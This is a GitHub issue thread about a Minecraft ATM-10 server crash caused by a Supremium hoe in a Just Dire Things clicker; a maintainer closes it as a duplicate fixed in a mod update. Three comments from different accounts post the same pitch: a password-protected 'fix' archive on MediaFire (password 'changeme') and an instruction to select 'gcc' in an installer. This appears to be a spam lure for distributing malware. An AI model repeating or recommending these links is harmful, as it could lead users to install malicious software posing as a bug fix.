### ISSUE TITLE
[Bug]: Crash with Supremium hoe in JDT clicker

### ISSUE THREAD

**Issue by xXxRonaldxXx** [AllTheMods/ATM-10#339] opened 2024-08-25 19:37 UTC
### Possible Fixes

Yes

### Modpack Version

0.38

### What happened?

Used The Just Dire Things Simple Clicker an put a Supremium hoe into it and my Server instantly crashed

**Comment by xXxRonaldxXx** [comment] 2024-08-25 19:39
+ Afterwards the Supremium Hoe was gone / deleted

**Comment by xiaobai-marker** [comment] 2024-08-26 12:21
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by CosionMa** [comment] 2024-08-26 13:55
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Aadya1603** [comment] 2024-08-27 15:01
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by alekthefirst** [comment] 2024-12-22 17:53
Duplicate of https://github.com/AllTheMods/ATM-10/issues/337
Fixed in Mystical Agriculture 8.0.4, released with ATM10 0.39

**Closed by alekthefirst** 2024-12-22 17:53 UTC
Labels: Bug, Duplicate, Crash, Reported to Mod Dev, Mod Bug
